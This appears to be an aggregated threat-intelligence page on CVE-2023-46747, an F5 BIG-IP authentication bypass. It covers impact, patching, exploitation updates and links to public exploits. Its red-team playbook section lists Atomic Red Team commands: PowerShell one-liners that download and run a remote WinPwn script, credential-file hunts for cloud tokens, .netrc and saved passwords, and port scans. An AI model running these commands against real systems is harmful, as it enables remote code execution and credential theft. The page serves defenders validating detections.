CVE-2023-46747
Overview
This vulnerability is an authentication bypass in the F5 BIG-IP Configuration utility (TMUI) caused by improper request handling that allows unauthorized requests to circumvent authentication controls. The root cause lies in the TMUI's failure to validate certain crafted HTTP requests, specifically involving AJP request smuggling techniques, affecting the management interface and self IP address access points. The flaw resides in the access policy manager component, enabling attackers to interact with privileged management endpoints without valid credentials.
Vulnerability Description
Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Impact
An unauthenticated attacker with network access to the management port or self IP addresses can bypass authentication and execute arbitrary system commands on the BIG-IP device. This enables full system compromise, including control over critical network infrastructure components. No prior credentials or user interaction are required, allowing attackers to escalate privileges, disrupt services, or exfiltrate sensitive configuration data, severely impacting organizational security posture.
Solution
F5 Networks has released security updates addressing this vulnerability; administrators should apply patches as detailed in the vendor advisory K000137353 available at https://my.f5.com/manage/s/article/K000137353. The advisory provides fixed versions of BIG-IP Access Policy Manager and instructions for verification. Organizations should prioritize upgrading to supported, patched versions and follow vendor guidance to mitigate exploitation risks.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Confirmed Groups
| Group | Victims | Source |
|---|---|---|
|
ransomhub
|
842 | ransomware.live |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the BIG-IP system's configuration utility presents a critical security flaw that allows unauthorized requests to bypass authentication mechanisms. This vulnerability stems from improper handling of requests, which enables an attacker with network access to the management port or self IP addresses to execute arbitrary system commands. The implications of this flaw are severe, as it undermines the integrity of the system and exposes it to a range of potential attacks, including unauthorized access and control over sensitive configurations.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. By leveraging network access, an attacker can send crafted requests that the system fails to authenticate properly. This could occur in various scenarios, such as when an organization has misconfigured its network security settings, allowing external entities to reach the management interfaces. Once an attacker gains access, they can execute commands that could lead to data breaches, service disruptions, or even complete system takeover, making this vulnerability a prime target for malicious actors.
The real-world impact of this vulnerability can be devastating for businesses. Organizations relying on the affected BIG-IP products for application delivery, security, and traffic management may face significant operational risks. A successful exploitation could result in unauthorized changes to critical configurations, leading to service outages, data loss, or exposure of sensitive information. Additionally, the reputational damage from such incidents can lead to loss of customer trust and potential legal repercussions, especially for businesses in regulated industries where data protection is paramount.
To detect and mitigate this vulnerability, organizations must implement a multi-layered security approach. Regularly updating and patching affected systems is crucial, as it ensures that known vulnerabilities are addressed promptly. Network segmentation can also play a vital role in limiting access to management interfaces, reducing the attack surface. Employing intrusion detection systems (IDS) can help identify unusual traffic patterns indicative of exploitation attempts. Furthermore, organizations should conduct regular security audits and vulnerability assessments to identify and remediate potential weaknesses in their infrastructure.
In conclusion, the vulnerability within the BIG-IP system's configuration utility poses a significant threat to organizations that utilize these products. The potential for unauthorized access and command execution highlights the need for robust security measures and proactive management of network configurations. By understanding the nature of this vulnerability and implementing effective detection and mitigation strategies, organizations can better protect themselves against the risks associated with this critical flaw.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-46747, with telemetry indicating a significant uptick in activity through management and self IP interfaces. This increase coincides with a slight rise in the Exploit Prediction Scoring System (EPSS) score, reflecting growing confidence in the exploitability of this critical authentication bypass vulnerability. Concurrently, new proof-of-concept exploits have surfaced on public repositories, enhancing adversaries’ capabilities to execute unauthenticated remote code execution against vulnerable BIG-IP systems. The presence of ransomware-linked threat actors further elevates the risk profile, as these groups are known to leverage this vulnerability in targeted campaigns. For defenders, this evolving landscape underscores an urgent need to prioritize detection and monitoring efforts around this vulnerability, as the expanding exploit toolkit and active threat actor interest heighten the likelihood of successful compromise. Overall, these developments substantiate an increased threat level, warranting heightened vigilance and accelerated response measures within affected environments.
Update 2 — June 22, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-46747, indicating increased adversary engagement with this critical F5 BIG-IP vulnerability. This surge in telemetry corresponds with a growing availability of proof-of-concept exploits, which have become more diverse and accessible, lowering the barrier for exploitation attempts. The persistence of ransomware-linked threat actors leveraging this vulnerability further amplifies the operational risk, as these groups are known to integrate such exploits into targeted intrusion campaigns. Although the exploit trend is not yet classified as rapidly increasing, the upward trajectory in both exploit development and observed activity suggests a heightened likelihood of successful compromise in unpatched environments. For defenders, this evolving threat landscape necessitates an elevated risk posture, as the convergence of active exploitation, expanding toolsets, and ransomware associations significantly intensifies the potential impact on affected networks.
Update 3 — July 08, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-46747, accompanied by the emergence of additional publicly available proof-of-concept exploits. This subtle uptick in activity, while not yet rapid, signals growing interest among threat actors, including ransomware-affiliated groups, in leveraging this critical vulnerability. The availability of multiple exploitation scripts lowers the barrier for adversaries to conduct unauthorized remote code execution against vulnerable F5 BIG-IP systems, thereby expanding the attack surface. Our telemetry indicates that this trend, although incremental, reflects a persistent and evolving threat environment that could facilitate more frequent and sophisticated intrusion campaigns. Consequently, the risk level for organizations running affected versions has increased modestly, underscoring the need for heightened vigilance as threat actors continue to refine their operational capabilities around this vulnerability.
Affected Products (100)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Access Policy Manager | All |
cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Firewall Manager | All |
cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Advanced Web Application Firewall | All |
cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Carrier-Grade Nat | All |
cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Carrier-Grade Nat | All |
cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Carrier-Grade Nat | All |
cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Carrier-Grade Nat | All |
cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
|
|
|
F5 | Big-Ip Carrier-Grade Nat | All |
cpe:2.3:a:f5:big-ip_carrier-grade_nat:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
F5 BIG-IP TMUI AJP Smuggling RCE
exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747
|
Michael Weber, Thomas Hendrickson, Sandeep Singh +1 | Unknown | unix, linux | View |
GitHub PoCs (9)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
W01fh4cker/CVE-2023-46747-RCE
exploit for f5-big-ip RCE cve-2023-46747
|
W01fh4cker | 208 | 47 | 2023-11-01 | View |
|
nvansluis/test_cve-2023-46747
|
nvansluis | 7 | 1 | 2023-11-02 | View |
|
maniak-academy/Mitigate-CVE-2023-46747
|
maniak-academy | 2 | 3 | 2023-11-01 | View |
|
Razzlemouse/F5-BIG-IP-SmuggleShell-CVE-2023-46747-Exploit
#F5-BIG-IP-CVE-2023-46747-Exploit – Unauthenticated RCE Python exploit & Nuclei template by Raguraman ✓ Automated TC...
|
Razzlemouse | 4 | 1 | 2025-12-03 | View |
|
RevoltSecurities/CVE-2023-46747
An Exploitation script developed to exploit the CVE-2023-46747 which Pre Auth Remote Code Execution of f5-BIG Ip producs
|
RevoltSecurities | 3 | 0 | 2023-11-03 | View |
|
vidura2/cve-2023-46747
|
vidura2 | 2 | 0 | 2024-02-11 | View |
|
fu2x2000/CVE-2023-46747
CVE-2023-46747 Criticle Auth Bypass
|
fu2x2000 | 0 | 1 | 2023-11-01 | View |
|
rainbowhatrkn/CVE-2023-46747-RCE
exploit for f5-big-ip RCE cve-2023-46747
|
rainbowhatrkn | 0 | 0 | 2024-03-15 | View |
|
cediegreyhat/BigFinger
CVE-2023-46747-RCE PoC
|
cediegreyhat | 0 | 0 | 2025-07-04 | View |
Ransomware Groups 1
Threat Feed
15 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-46747 |
| my.f5.com |
GitHub CVE
vendor-advisory
|
https://my.f5.com/manage/s/article/K000137353 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/175673/F5-BIG-IP-TMUI-AJP-Smuggling-Remote-Command-Execution.html |
| secpod.com |
GitHub CVE
|
https://www.secpod.com/blog/f5-issues-warning-big-ip-vulnerability-used-in-active-exploit-chain/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-46747 |